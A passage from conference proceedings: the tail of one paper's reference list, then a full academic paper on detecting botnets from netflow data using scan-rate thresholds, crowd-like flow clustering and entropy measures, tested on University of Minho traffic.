Dracopoulos, D. C. (2008) “Evolutionary Learn<strong>in</strong>g”, <strong>in</strong> B. Wah (Ed.), Wiley Encyclopedia of Computer Science and<br />
Eng<strong>in</strong>eer<strong>in</strong>g. New York, John Wiley and Sons.<br />
Eiben, A. E. , H<strong>in</strong>terd<strong>in</strong>g, R., and Michalewicz, Z. (1999) “Parameter control <strong>in</strong> evolutionary algorithms”, IEEE<br />
Transactions on Evolutionary Computation, Vol 3, No. 2, pp. 124–141.<br />
Eiben, A. E., and Smith, J. E. (2003) Introduction to Evolutionary Comput<strong>in</strong>g, Berl<strong>in</strong>, Spr<strong>in</strong>ger.<br />
Holland, J. H. (1975) Adaptation <strong>in</strong> Natural and Artificial Systems: An Introductory Analysis with Applications to<br />
Biology, Control, and Artificial Intelligence, Cambridge, MA, MIT Press.<br />
ISACA (2009) “An Introduction to the Bus<strong>in</strong>ess Model for Information <strong>Security</strong>,” ISACA.<br />
Kirt, T., and Kivimaa, J. (2010) “Optimiz<strong>in</strong>g IT security costs by evolutionary algorithms”, <strong>in</strong> C. Czosseck, and K.<br />
Pod<strong>in</strong>s, (Eds.), Conference on Cyber Conflict Proceed<strong>in</strong>gs 2010, Tall<strong>in</strong>n, Estonia, Cooperative Cyber Defence<br />
Centre of Excellence Publications, pp. 145–160.<br />
Kivimaa, J. (2009) “Apply<strong>in</strong>g a costs optimiz<strong>in</strong>g model for IT security”, <strong>in</strong> H. Santos (Ed.), Proceed<strong>in</strong>gs of the 8th<br />
European Conference on Information Warfare and <strong>Security</strong>, Read<strong>in</strong>g, UK, <strong>Academic</strong> Publish<strong>in</strong>g <strong>Limited</strong>, pp.<br />
142–153.<br />
Kivimaa, J. Ojamaa, A. and Tyugu, E. (2009) “Graded security expert system”, <strong>in</strong> CRITIS 2008: Third International<br />
Workshop on Critical Information Infrastructure <strong>Security</strong>, Rome, Spr<strong>in</strong>ger.<br />
Michalewicz, Z., and Fogel, D. B. (2004) How To Solve It: Modern Heuristics, Berl<strong>in</strong>, Spr<strong>in</strong>ger.<br />
NISPOM (2006) “National Industrial <strong>Security</strong> Program Operat<strong>in</strong>g Manual,” U.S. Department of Defense..<br />
Ojamaa, A., Tyugu, E., and Kivimaa, J. (2008) “Pareto-optimal situation analysis for selection of security measures”,<br />
<strong>in</strong> Military Communications Conference MILCOM 2008: Unclassified Proceed<strong>in</strong>gs, Piscataway, NJ, IEEE, pp.<br />
3224–3230.<br />
Wolpert, D., and Macready, W. G. (1997) “No free lunch theorems for optimization”, IEEE Transactions on<br />
Evolutionary Computation, Vol 1, No. 1, pp. 67–82.<br />
184
Botnet Detection: A Numerical and Heuristic Analysis<br />
Luís Mendonça and Henrique Santos<br />
Universidade do M<strong>in</strong>ho, Braga, Portugal<br />
mendonca.luis@gmail.com<br />
hsantos@dsi.um<strong>in</strong>ho.pt<br />
Abstract: Internet cyber crim<strong>in</strong>ality has changed its ways s<strong>in</strong>ce the old days where attacks were greatly motivated by<br />
recognition and glory. A new era of cyber crim<strong>in</strong>als are on the move. Real armies of robots (bots) swarm the <strong>in</strong>ternet<br />
perpetrat<strong>in</strong>g precise, objective and coord<strong>in</strong>ated attacks on <strong>in</strong>dividuals and organizations. Many of these bots are now<br />
coord<strong>in</strong>ated by real cybercrime organizations <strong>in</strong> an almost open-source driven development, which results <strong>in</strong> the<br />
proliferation of many bot variants with ref<strong>in</strong>ed capabilities and <strong>in</strong>creased detection complexity. Economical and<br />
reputation damages are difficult to quantify but the scale is widen<strong>in</strong>g. It’s up to one’s own imag<strong>in</strong>ation to figure out<br />
how much was lost <strong>in</strong> April of 2007 when Estonia suffered the well known distributed attack on its <strong>in</strong>ternet countrywide<br />
<strong>in</strong>frastructure. Among the techniques available to mitigate this threat, botnet detection emerges as a relevant<br />
solution. This technology has also evolved <strong>in</strong> recent years but it is still far from a def<strong>in</strong>itive solution. New techniques,<br />
constantly appear<strong>in</strong>g, <strong>in</strong> areas such as host <strong>in</strong>fection, deployment, ma<strong>in</strong>tenance, control and dissimulation of bots are<br />
constantly chang<strong>in</strong>g the detection vectors thought and developed. In that way, research and implementation of<br />
anomaly-based botnet detection systems is fundamental to p<strong>in</strong>po<strong>in</strong>t and track the cont<strong>in</strong>uously chang<strong>in</strong>g botnets and<br />
clones, which are impossible to identify by simple signature-based systems. This paper presents the studies and<br />
tests made to def<strong>in</strong>e an effective set of traffic parameters capable of model<strong>in</strong>g both normal and abnormal activity of<br />
networks, focus<strong>in</strong>g <strong>in</strong> botnet activity detection through behavior, numerical and heuristic model<strong>in</strong>g. Different types of<br />
botnets (IRC, P2P, HTTP, fast-flux among others) are <strong>in</strong>itially analyzed followed by the study of some exist<strong>in</strong>g<br />
detection techniques and tools like Honeynet, Botsniffer and Botm<strong>in</strong>ner. Follow<strong>in</strong>g this <strong>in</strong>itial study, numerical and<br />
heuristic aspects of both normal and bot traffic are <strong>in</strong>vestigated. F<strong>in</strong>ally, a set of traffic parameters is proposed aim<strong>in</strong>g<br />
fast and precise botnet detection, with low false positive rate.<br />
Keywords: Botnet detection, anomaly-based, heuristics, numerical, behavior<br />
1. Introduction<br />
Internet security has been targeted <strong>in</strong> <strong>in</strong>numerous ways throughout the ages. Concern<strong>in</strong>g attack tools,<br />
the comb<strong>in</strong>ation of many well known techniques has been mak<strong>in</strong>g botnets an untraceable, effective,<br />
dynamic and powerful mean to perpetrate all k<strong>in</strong>ds of malicious activities such as Distributed Denial of<br />
Service (DDoS) attacks, espionage, email spam, malware spread<strong>in</strong>g, data theft, click and identity frauds,<br />
among others (Mielke & H. Chen 2008).<br />
The detection of bots (sometimes called zombies or drones when referr<strong>in</strong>g to the mach<strong>in</strong>es <strong>in</strong>fected) and<br />
botnets become critical, and can be made us<strong>in</strong>g three dist<strong>in</strong>ct methodologies: cooperative behavior<br />
analysis, signature analysis and attack behavior analysis (Bailey et al. 2009). This paper will focus on the<br />
first two approaches hav<strong>in</strong>g <strong>in</strong> m<strong>in</strong>d that botnet detection should be time-efficient (J<strong>in</strong>g et al. 2009).<br />
Objectively, this paper pretends to contribute to botnet detection and track<strong>in</strong>g, by just analyz<strong>in</strong>g network<br />
behavior. The advantage of such an approach is its relative simplicity and possible operation <strong>in</strong> a network<br />
core ideally with no packet and no host-based <strong>in</strong>spections. Either centralized or decentralized botnets<br />
can be detected us<strong>in</strong>g such an approach though dist<strong>in</strong>ct traffic features must be considered for each<br />
topology.<br />
The rem<strong>in</strong>der of this paper is organized as follows: <strong>in</strong> section 2 we present some of the work done on<br />
anomaly-based botnet detection and characterization. In section 3 we analyze several possible network<br />
metrics and correlations hav<strong>in</strong>g <strong>in</strong> m<strong>in</strong>d fast and precise botnet detection. Section 4 describes the<br />
research patterns followed along with the tools used and already developed to support the analysis<br />
framework created. Also <strong>in</strong> this section, tests and correspond<strong>in</strong>g results on some anomaly detection<br />
vectors are analyzed <strong>in</strong> order to propose a detection model. A conclusion is then presented along with<br />
the discussion of this model’s possible detection difficulties and ways to improve it.<br />
2. Related work<br />
The analysis of botnet network behavior is a relatively recent research area but has already produced<br />
some <strong>in</strong>terest<strong>in</strong>g and coherent results. Some of these researches are next presented.<br />
BotHunter (Guofei Gu et al. 2007) tracks communication flows between <strong>in</strong>ternal and external hosts<br />
correlat<strong>in</strong>g them to IDS events <strong>in</strong> order to effectively detect <strong>in</strong>ternal host malware <strong>in</strong>fections.<br />
185
Luís Mendonça and Henrique Santos<br />
BotSniffer (G. Gu, Zhang, et al. 2008) uses statistical algorithms to analyze topology- centric botnets and<br />
detect their hosts crowd-like behaviors. BotSniffer work was complemented with BotM<strong>in</strong>ner (G. Gu,<br />
Perdisci, et al. 2008), where a correlation between C&C (Command and Control) communication and<br />
correspond<strong>in</strong>g malicious activity is also established.<br />
In (Akiyama 2007) three metrics are proposed to detect a botnet cooperative behavior: relationship,<br />
response and synchronization. On the other hand, Strayer manages to establish a correlation between<br />
<strong>in</strong>ter-arrival time and packet size (Strayer et al. 2008).<br />
BotCop (W. Lu & Tavallaee 2009) analyses the temporal-frequent characteristic of flows to differentiate<br />
the malicious communication traffic created by bots from normal traffic generated by human be<strong>in</strong>gs. The<br />
work done <strong>in</strong> (Karasaridis et al. 2007) contributes to the botnet detection research by establish<strong>in</strong>g a<br />
distance metric between a pre-def<strong>in</strong>ed IRC botnet traffic model and passively collected network traffic<br />
(flows).<br />
However, dist<strong>in</strong>ct approaches from the aforementioned botnet detection vectors exist: DNS traffic<br />
analysis is one of them. This detection vector was explored <strong>in</strong> (Villamar<strong>in</strong>-Salomón & Brustoloni 2008),<br />
(Morales et al. 2010), (Choi et al. 2007) and by BotXRayer (I. Kim et al. 2009).<br />
Another important area of botnet detection research is botnet measur<strong>in</strong>g and characterization. In (Dagon<br />
& G. Gu 2007) the authors made an important contribution to this research by present<strong>in</strong>g a model for<br />
botnet operation and size estimation. On the characterization side, Honeynets and honeypots keep the<br />
lead <strong>in</strong> the bot hijack<strong>in</strong>g processes allow<strong>in</strong>g researchers to deeply study bot code and modus-operandi.<br />
3. Botnet anomaly-based detection<br />
Any bot master needs to control his army of bots <strong>in</strong> some way. Thus, a command and control (C&C)<br />
channel needs to be established <strong>in</strong> order to <strong>in</strong>struct the bots of their actions (scan, recruit, upgrade,<br />
attack and others). C&C channels can be created us<strong>in</strong>g either centralized (IRC or HTTP) or decentralized<br />
(P2P, unstructured or fast-flux networks) architectures (Zhu et al. 2008). In (Dagon & G. Gu 2007) it is<br />
confirmed that C&C is often the weak l<strong>in</strong>k of a botnet, although C&C-oriented botnet disruption wouldn’t<br />
always be the best approach.<br />
Although the use of known and stable C&C channels is still preferred by botmasters on the basis of<br />
stability, new types of C&C channels are constantly be<strong>in</strong>g implemented <strong>in</strong> order to evade exist<strong>in</strong>g<br />
detection techniques. The use of Twitter servers and RSS feeds service are some examples (Estrada &<br />
Nakao 2010). Any new type of C&C will be <strong>in</strong>visible to simple comparisons with pre-determ<strong>in</strong>ed models of<br />
botnet operation. The use of behavior analysis and correlation is, therefore, fundamental to correctly<br />
identify such dynamic and dissimulated botnets.<br />
There are many traffic data sources that can be used to detect network anomalous usage and botnet<br />
activity. Among these we can f<strong>in</strong>d DNS Data, Netflow Data, Packet Tap Data, Address Allocation Data,<br />
Honeypot Data and Host Data (Bailey et al. 2009).<br />
In order to allow the proposed system to operate <strong>in</strong> large networks, this analysis will focus on the study of<br />
netflows as this k<strong>in</strong>d of data is simpler and faster to process than other types mentioned. Honeypot Data<br />
and Packet Tap Data require heavier and slower process<strong>in</strong>g while Host Data analysis fall <strong>in</strong>to the<br />
category of anti-virus protection systems. Furthermore, many supervised networks already implement<br />
netflow logg<strong>in</strong>g which could, <strong>in</strong> turn, contribute to an easier implementation of the detection system<br />
proposed. The use of netflows is also welcome when deal<strong>in</strong>g with traffic privacy issues. The major<br />
drawback of this approach is the loss of some traffic characterization details.<br />
Several botnet features can be used <strong>in</strong> order to determ<strong>in</strong>e bot-related anomalous network activities:<br />
relationship, response and synchronization are some of them. Correlations can be established between<br />
these features by analyz<strong>in</strong>g all visible hosts’ activity <strong>in</strong> a pre-determ<strong>in</strong>ed period and can be established <strong>in</strong><br />
both vertical and horizontal vectors.<br />
Vertical correlation uses the <strong>in</strong>formation captured from one s<strong>in</strong>gle host activities <strong>in</strong> order to identify its<br />
botnet membership and malicious <strong>in</strong>tents. Horizontal correlation, on the other hand, exploits the<br />
synchronized behavior of several hosts belong<strong>in</strong>g to the same botnet (Estrada & Nakao 2010). Vertical<br />
correlations can be established, <strong>in</strong> theory, through the detection of anomalous responses to known<br />
186
Luís Mendonça and Henrique Santos<br />
request/response pairs. Though be<strong>in</strong>g feasible, used alone, this method can be very sensitive and prone<br />
to produce high false positive rate.<br />
Many flow-based correlations can be established, such as the number of bytes and packets per host, port<br />
and flow; the number of different IPs and ports contacted by a host and the host’s flow <strong>in</strong>terval and<br />
duration. These correlations are able to identify network scans, flash-crowd behaviors as well as other<br />
anomalous network events.<br />
The netflow analysis approach method proposed <strong>in</strong> this paper is similar to systems like BotM<strong>in</strong>er and<br />
BotSniffer but its time-efficiency goal really differentiates it from the others.<br />
While BotM<strong>in</strong>er and BotSniffer algorithms focuses ma<strong>in</strong>ly on the attack phase, this approach starts its<br />
detection analysis <strong>in</strong> the <strong>in</strong>itials host <strong>in</strong>fection and bot scann<strong>in</strong>g phases.<br />
Similarly to other botnet detection systems, the goal of the proposed analysis is not the detection of<br />
s<strong>in</strong>gle <strong>in</strong>fected hosts but the detection of specific global network anomalies that can lead to the<br />
identification of coord<strong>in</strong>ated hosts’ activity relative to botnet operation.<br />
4. Behavior analysis, experimental setup and results<br />
This section presents the current bot and botnet behaviors under analysis and the correspond<strong>in</strong>g<br />
measurable characteristics that are capable of botnet activity detection. Some of the heuristics proposed<br />
are then tested us<strong>in</strong>g the developed analysis framework. A detection model is then presented.<br />
4.1 Bot Behavior<br />
In order to recruit more bots for a botnet, every zombie scans the network look<strong>in</strong>g for vulnerable hosts to<br />
proper malware <strong>in</strong>stallation. This behavior should be the first one to produce clear evidence of possible<br />
bot activity and is <strong>in</strong>dependent of botnet type (HTTP, IRC, P2P, or other).<br />
Normally, scan activity targets few ports with<strong>in</strong> a specific host always hav<strong>in</strong>g <strong>in</strong> m<strong>in</strong>d specific<br />
vulnerabilities. HTTP servers, per example, normally respond to HTTP, HTTPS and, possibly, FTP<br />
requests (three ports). Other much stealthier types of scann<strong>in</strong>g can be found <strong>in</strong> the <strong>in</strong>ternet. The<br />
verification of s<strong>in</strong>gle port connectivity on specific and targeted hosts (us<strong>in</strong>g a list shared by bots), is one<br />
possibility among many others. Thus, scann<strong>in</strong>g activity can be detected by monitor<strong>in</strong>g host port and IP<br />
connection rates.<br />
Other ways of dist<strong>in</strong>guish<strong>in</strong>g bot activity from normal network use <strong>in</strong>volves the study of bot automate<br />
behavior. Bot C&C connections are normally established us<strong>in</strong>g a fixed time rate (W. Lu & Tavallaee<br />
2009). Though some bots can make its C&C connections randomly, this can reduce the response time of<br />
the botnet. Fixed time connection rates can be detected by analyz<strong>in</strong>g the temporal characteristics of<br />
netflows, for example.<br />
Another characteristic of bot automate behavior can be found <strong>in</strong> the similarity of its network flows <strong>in</strong> terms<br />
of packets’ size and count.<br />
4.2 Botnet behavior<br />
Now that some bot behaviors are def<strong>in</strong>ed, it is important to establish a botnet behavior model. This can<br />
be achieved by observ<strong>in</strong>g the holistic property of a botnet. When observed together, though<br />
<strong>in</strong>dependents, bots behave like a s<strong>in</strong>gle <strong>in</strong>telligent entity. This synchronized and related behavior must<br />
exist so the botnet can be useful to the botmaster (from scan to attack activity). Thus, similar and<br />
synchronized network traffic should be strong evidence of botnet activity.<br />
4.3 Netflows numerical and statistical analysis<br />
Several numerical properties are available <strong>in</strong> network flows, or can be easily derived, <strong>in</strong> order to detect<br />
botnet activity. Basic attributes of most netflows formats <strong>in</strong>clude flow start and end time, source IP and<br />
port, dest<strong>in</strong>ation IP and port, bytes and packets <strong>in</strong> the flow, as well as the protocol used. The numerical<br />
analysis of netflows must, then, be based on the study of such attributes and their possible<br />
relations/dependencies. All these attributes can be used to cluster collected netflows or calculate a host’s<br />
associated entropy.<br />
187
Luís Mendonça and Henrique Santos<br />
Cluster<strong>in</strong>g can be based on simple attributes or us<strong>in</strong>g composed ones. Some examples of composed<br />
attributes are the bytes per packet, bytes per source host, or the flow time <strong>in</strong>terval by host, among others.<br />
Several classification and cluster<strong>in</strong>g methods can be used. K-means and X-means (G. Gu, Perdisci, et al.<br />
2008), Cos<strong>in</strong>e distance, Euclidean distance, Earth Mover’s distance (EMD), Kullback-Leibler asymmetric<br />
distance, term frequency / <strong>in</strong>verse document frequency (TF/IDF), J48 decision trees, Naïve Bayes and<br />
Bayesian Networks (Karasaridis et al. 2007) are some of them.<br />
Entropy estimation is also useful for botnet detection <strong>in</strong> the way that it can tell how much randomness is<br />
<strong>in</strong>volved <strong>in</strong> the traffic observed. Hosts behav<strong>in</strong>g similarly will have equivalent entropy values. Bot scan<br />
activity, for example, will certa<strong>in</strong>ly have low IP/port distribution entropy. Shannon’s entropy or other<br />
generalized entropies such as def<strong>in</strong>ed by Renyi and Tsallis can be used <strong>in</strong> traffic characterization and<br />
anomaly detection (Tellenbach et al. 2009). Tsallis entropy is given by the follow<strong>in</strong>g expression:<br />
S<strong>in</strong>ce Tsallis entropy is better suited for non-Gaussian measures (Tellenbach et al. 2009) it will be used<br />
<strong>in</strong> this study to analyze contacted IPs and ports, connections time <strong>in</strong>terval and bytes/packets per flow.<br />
After cluster<strong>in</strong>g or entropy calculations are made, thresholds must be applied <strong>in</strong> order to def<strong>in</strong>e which<br />
host or traffic represents an anomalous event. This selection is prone to produce type I and II statistical<br />
errors represented <strong>in</strong> the form of false positive and negative rates.<br />
In that way, both parameter and threshold def<strong>in</strong>itions play a critical role concern<strong>in</strong>g the detection<br />
efficiency, <strong>in</strong> particularly false alarms miss detection and the balance between false positives and<br />
negatives.<br />
4.4 Analysis framework<br />
In order to develop and test the proposed heuristics, several tools were used: Nfdump project tools<br />
(Nfdump 2010) allowed the capture and <strong>in</strong>itial flow pars<strong>in</strong>g; Microsoft SQL Server (Microsoft 2011c),<br />
Analysis Services (Microsoft 2011a) and Report<strong>in</strong>g Services (Microsoft 2011b) provided flow storage,<br />
process<strong>in</strong>g, chart<strong>in</strong>g and statistical analysis; and, f<strong>in</strong>ally, BotAnalytics (developed <strong>in</strong> C# dur<strong>in</strong>g this<br />
research) allowed the import of all collected netflows <strong>in</strong>to an SQL Server database.<br />
To allow the <strong>in</strong>jection of bot traffic (currently only available <strong>in</strong> pcap dump format) <strong>in</strong>to the netflow<br />
database, a feature was implemented <strong>in</strong> BotAnalytics that permitted the conversion of dump capture files<br />
<strong>in</strong>to flows and correspond<strong>in</strong>g <strong>in</strong>sertion <strong>in</strong>to the SQL Server Database. This conversion was made by<br />
aggregat<strong>in</strong>g the captured packets <strong>in</strong>to a unidirectional five tuple record (Source IP, Source Port,<br />
Dest<strong>in</strong>ation IP, Dest<strong>in</strong>ation Port and Protocol) with correspond<strong>in</strong>g number of packets, bytes, start and end<br />
time of the flow. A flow ag<strong>in</strong>g mechanism was also <strong>in</strong>troduced <strong>in</strong> the pcap dump import feature that<br />
automatically determ<strong>in</strong>ed the end of a flow when, for an active five tuple record, a packet wasn’t seen for,<br />
at least, sixty seconds.<br />
The (<strong>in</strong>itially assumed benign) traffic datasets used <strong>in</strong> this research were captured <strong>in</strong> the University of<br />
M<strong>in</strong>ho network edge. They were collected and parsed us<strong>in</strong>g nfdump tools before be<strong>in</strong>g imported <strong>in</strong>to the<br />
SQL database by BotAnalytics (<strong>in</strong>ternal proxy and DNS servers traffic was excluded at this time for the<br />
sake of analysis simplicity). Nfdump tools were <strong>in</strong>stalled <strong>in</strong> a server connected to a mirrored port of a<br />
switch at the edge of the campi network. All traffic enter<strong>in</strong>g and leav<strong>in</strong>g the university’s network was<br />
captured.<br />
All this <strong>in</strong>itial heuristics validation and development were made on a specific dataset represent<strong>in</strong>g the<br />
University of M<strong>in</strong>ho UDP and TCP traffic on the 11 th January 2011. More than thirty million flows were<br />
imported, at this time, <strong>in</strong>to de SQL Server database.<br />
4.5 Scan detection heuristic<br />
Scan detection is a common feature <strong>in</strong> IDS systems. Many possible detection approaches are possible to<br />
be implemented us<strong>in</strong>g statistical flow analysis. This paper presents one of the approaches currently<br />
188
Luís Mendonça and Henrique Santos<br />
under study. The goal of scan detection <strong>in</strong> the context of botnet activity detection is the identification of<br />
suspicious hosts that can later be observed <strong>in</strong> more detail apply<strong>in</strong>g, cumulatively, a wider set of heuristics<br />
<strong>in</strong> order to identify a botnet and its constituent hosts.<br />
Model<strong>in</strong>g scan behavior was the first step taken to develop detection capable heuristics. Scan activity<br />
flows were assumed to have small packets (few bytes) with high number of dest<strong>in</strong>ation ports and IPs<br />
<strong>in</strong>volved with<strong>in</strong> a relatively short period of time. In order to verify this behavior on the captured traffic, for<br />
each source IP and ten m<strong>in</strong>ute period, the number of dist<strong>in</strong>ct IPs and ports were counted. The result was<br />
then filtered us<strong>in</strong>g the Dist<strong>in</strong>ct Dest<strong>in</strong>ation IPs (DDIP) and Port/IP Ratio (PIR) thresholds. PIR is<br />
calculated by divid<strong>in</strong>g the number of dist<strong>in</strong>ct ports per dist<strong>in</strong>ct IPs contacted. These criteria preserved<br />
only flows with high dist<strong>in</strong>ct dest<strong>in</strong>ation IPs and ports contacted. The result was then filtered by a<br />
Bytes/Packets Ratio (BPR) threshold, aim<strong>in</strong>g to keep only traffic with small packets <strong>in</strong>volved. The chart<br />
presented <strong>in</strong> Figure 1, shows the number of dist<strong>in</strong>ct source IPs with scan-like activity. It was built with a<br />
BPR of 100 bytes, and both DDIP and PIR of 5.<br />
Figure 1: Number of dist<strong>in</strong>ct hosts with scan-like activity<br />
The development of this <strong>in</strong>itial scan heuristic allowed to get a closer contact with the problem but didn’t<br />
brought forward, per se, anomalous activity. Better results were achieved when aim<strong>in</strong>g the study at<br />
specific application traffic as seen <strong>in</strong> the last heuristic presented <strong>in</strong> this paper.<br />
4.6 Crowd-like behavior heuristic<br />
The crowd-like behavior heuristic was developed with the follow<strong>in</strong>g observation <strong>in</strong> m<strong>in</strong>d: flows with the<br />
same number of bytes and packets sent from many dist<strong>in</strong>ct hosts, dur<strong>in</strong>g a relatively small time <strong>in</strong>terval,<br />
are possibly related and very alike to what a botnet activity would produce. Based on this assumption,<br />
and for each ten m<strong>in</strong>ute period, all the UDP and TCP flows with less than 1000 bytes and with the same<br />
number of packets and bytes where grouped. At this stage, every source IP with only one packet <strong>in</strong> the<br />
cluster was removed <strong>in</strong> order to filter out IPs with small contribution to the cluster. The 1000 bytes limit<br />
selection was based on the assumption that botnet communication is based on small packet exchanges<br />
(Strayer et al. 2008). Large bandwidth is commonly associated with bulk transfers or downloads. The<br />
result<strong>in</strong>g clusters thus conta<strong>in</strong>ed hosts with similar flow characteristics. The next step was to elim<strong>in</strong>ate the<br />
clusters hav<strong>in</strong>g less than five IPs. This threshold criterion was assumed after analyz<strong>in</strong>g the result<strong>in</strong>g<br />
clusters content. Port usage analysis made clear that a vast majority of its flows were related to NTP and<br />
DNS usage mak<strong>in</strong>g such clusters not important to this analysis.<br />
Some clusters were then excluded based on their relevance. A cluster was considered relevant if its<br />
<strong>in</strong>formation was useful. Clusters with the majority of the source IPs seen <strong>in</strong> the ten m<strong>in</strong>ute period could<br />
not be considered relevant s<strong>in</strong>ce they conta<strong>in</strong>ed probably normal traffic. For this matter, an Environment<br />
189
Luís Mendonça and Henrique Santos<br />
Ratio (ER) and Threshold (ET) were def<strong>in</strong>ed. ER was determ<strong>in</strong>ed by the ratio between dist<strong>in</strong>ct hosts <strong>in</strong><br />
the cluster versus the total dist<strong>in</strong>ct hosts <strong>in</strong> the ten m<strong>in</strong>ute period under analysis. The ET used <strong>in</strong> this<br />
<strong>in</strong>itial research was 0.001 and it was selected after carefully analyz<strong>in</strong>g the clusters created and verify<strong>in</strong>g<br />
aga<strong>in</strong> that clusters hav<strong>in</strong>g ER higher than the selected ET (0.001) represented normal traffic (DNS, NTP).<br />
Figure 2 shows a chart represent<strong>in</strong>g the number of dist<strong>in</strong>ct source IPs (size of the bubbles) with filtered<br />
flows hav<strong>in</strong>g the same number of bytes and packets between 12:05 and 12:15 of the 11 th January 2011.<br />
Two quick remarks can be done whilst observ<strong>in</strong>g the chart: no flows could be found with less than 378<br />
bytes and more than 8 packets, and there were large clusters <strong>in</strong> the bottom left corner of the chart<br />
reveal<strong>in</strong>g the existence of many hosts with similar flows hav<strong>in</strong>g few, small packets.<br />
Figure 2: Dist<strong>in</strong>ct source IPs per number of bytes and packets<br />
F<strong>in</strong>ally, and for a ten m<strong>in</strong>ute period, a Cluster<strong>in</strong>g Score (CT) was determ<strong>in</strong>ed for each IP. CT was<br />
calculated by count<strong>in</strong>g the number of crowd-like clusters an IP belonged to. All the IPs with a CT below 5<br />
and, thus, with less crowd-like behavior, were filtered out at this stage. All the thresholds and<br />
correspond<strong>in</strong>g values here presented were used ma<strong>in</strong>ly for model and heuristic validation and are still<br />
under analysis. The chart <strong>in</strong> Figure 3 shows us, for each ten m<strong>in</strong>ute period, the number of dist<strong>in</strong>ct source<br />
IPs belong<strong>in</strong>g to suspicious clusters. Each of these hosts thus possesses crowd-like behavior.<br />
Figure 3: Number of dist<strong>in</strong>ct source IPs with crowd-like behavior per ten-m<strong>in</strong>ute period<br />
190
Luís Mendonça and Henrique Santos<br />
This data brought forward some <strong>in</strong>terest<strong>in</strong>g events when drilled down. The majority of the hosts detected<br />
with crowd like behavior revealed a high connection rate on unusual ports and with IPs scattered along<br />
geographically dispersed IPs. Further <strong>in</strong>vestigation is now necessary to dist<strong>in</strong>guish if these anomalous<br />
flows represented malicious activities.<br />
4.7 Crowd-like SQL server scan behavior heuristic<br />
The last heuristic presented is a much more targeted one s<strong>in</strong>ce it is directed to a specific protocol and<br />
application behaviors analysis. SQL is a very important source of application vulnerabilities, which makes<br />
SQL Server port scans very common. An exist<strong>in</strong>g buffer overflow bug <strong>in</strong> Microsoft SQL Server turned this<br />
application <strong>in</strong>to the spread<strong>in</strong>g mean for the Slammer Worm for example.<br />
The goal of this analysis was to model specific scan behaviors. To f<strong>in</strong>d out if - and how - SQL Server<br />
oriented scan activity were be<strong>in</strong>g done <strong>in</strong> the campus’ network, all the flows not directed to SQL Server<br />
ports (1423 and 1433) or with more than 1000 bytes, were filtered out. Note that accord<strong>in</strong>g to university’s<br />
security policy it would be anomalous the existence of SQL Server connections with hosts outside the<br />
university’s network.<br />
Several such scans were found on the 11 th of January 2011. The chart <strong>in</strong> Figure 4 shows the number of<br />
dist<strong>in</strong>ct IPs with connections (or attempts) to SQL Server ports related to the average bytes per packet<br />
used <strong>in</strong> the connection, dur<strong>in</strong>g the day. It was possible to observe that most scan traffic had small bytes<br />
per packet ratio (BPR) and that this ratio didn’t go beyond the 300 bytes.<br />
Figure 4: Number of dist<strong>in</strong>ct hosts connect<strong>in</strong>g to SQL server ports per bytes per packet<br />
Table 1: Top 5 bytes per packet clusters with higher SQL Server scan activity<br />
Bytes per Packet Number of Dist<strong>in</strong>ct source IPs<br />
48 426<br />
40 49<br />
52 25<br />
44 10<br />
46 7<br />
The follow<strong>in</strong>g step was to analyze <strong>in</strong> detail each host <strong>in</strong>volved <strong>in</strong> the scann<strong>in</strong>g, try<strong>in</strong>g to model scan<br />
activities and, at the same time, detect crowd-like behaviors. Three important scan methodologies were<br />
found <strong>in</strong> the analysis of this traffic dataset: aggressive (ten thousand IPs scanned <strong>in</strong> ten m<strong>in</strong>utes by one<br />
s<strong>in</strong>gle host), constant (n<strong>in</strong>e IPs scanned throughout the day <strong>in</strong> each ten m<strong>in</strong>ute period by a s<strong>in</strong>gle host)<br />
191
Luís Mendonça and Henrique Santos<br />
and distributed (more than forty hosts scann<strong>in</strong>g a different sets of IPs with a rate of one IP scanned per<br />
five m<strong>in</strong>ute period).<br />
A crowd-like behavior could be established <strong>in</strong> this distributed scann<strong>in</strong>g. Besides hav<strong>in</strong>g a time-related<br />
correlation (five m<strong>in</strong>ute fixed scann<strong>in</strong>g <strong>in</strong>terval, all of the hosts were geographically close and scanned<br />
different sets of IPs. This f<strong>in</strong>al characteristic was the f<strong>in</strong>al proof of their cooperative behavior.<br />
4.8 Detection model<br />
The botnet detection model under study is currently considered to be based on two vectors: scann<strong>in</strong>g<br />
activity and crowd-like behaviors analysis. Suspicious hosts are first identified by the scan activity vector<br />
so they can have their network behavior thoroughly analyzed. Botnet activity identification is made<br />
whenever synchronized and similar flows are exchanged by many different suspicious hosts.<br />
This model has the potential to detect all types of botnets. Traffic features such as the size and number of<br />
packets can be used to detect bot activity or crowd-behavior <strong>in</strong> both centralized and decentralized botnet<br />
topologies.<br />
5. Conclusions and future work<br />
A hard and bendy road ahead is still wait<strong>in</strong>g but the prelim<strong>in</strong>ary results achieved are great contributions<br />
to a better knowledge of the problem. It was proved, though, that it is possible to detect network<br />
anomalies by solely analyz<strong>in</strong>g netflow attributes.<br />
The biggest challenges found up to this moment were collect<strong>in</strong>g, filter<strong>in</strong>g and analyz<strong>in</strong>g large size traffic<br />
datasets. Many different netflows formats were found <strong>in</strong> the first datasets collected (nfdump, flow-tools<br />
(Flow-tools 2010) and others) which made their study a hard task. New tools must now be tested and,<br />
perhaps, developed <strong>in</strong> order to simplify such tasks.<br />
For the sake of system configuration and management, more thresholds must also be def<strong>in</strong>ed to allow<br />
the adaptation of present and future heuristics to different supervised networks. Every network<br />
adm<strong>in</strong>istrator must have <strong>in</strong> m<strong>in</strong>d that these threshold configurations are very sensitive and should be<br />
correctly def<strong>in</strong>ed <strong>in</strong> order to balance true and false positive detection rates.<br />
Although the heuristics proposed <strong>in</strong> this paper lack further <strong>in</strong>vestigation and development, they were able<br />
to p<strong>in</strong>po<strong>in</strong>t some important network events that, when drilled-down, presented real deviations from the<br />
normal network traffic. To determ<strong>in</strong>e if such anomalies represent real, botnet-related, malicious traffic, is<br />
still a work to be done.<br />
The greatest contribution made by this <strong>in</strong>itial analysis to future work was the conclusion that, the search<br />
for network anomalies must be oriented by a previous classification and characterization of the traffic<br />
under analysis (protocols and ports for example). The search for a wide spectrum anomaly model is<br />
prone to failure s<strong>in</strong>ce each protocol and application has its own specific behaviors. In nature, it would be<br />
like f<strong>in</strong>d<strong>in</strong>g animal anomalies by simply check<strong>in</strong>g a predeterm<strong>in</strong>ed characteristic like the existence of fur.<br />
The <strong>in</strong>existence of fur is normal <strong>in</strong> some animals but not <strong>in</strong> others.<br />
The <strong>in</strong>jection of real bot traffic will certa<strong>in</strong>ly be a necessary step to further validate and enhance the<br />
current proposed heuristics as well as to establish new ones.<br />
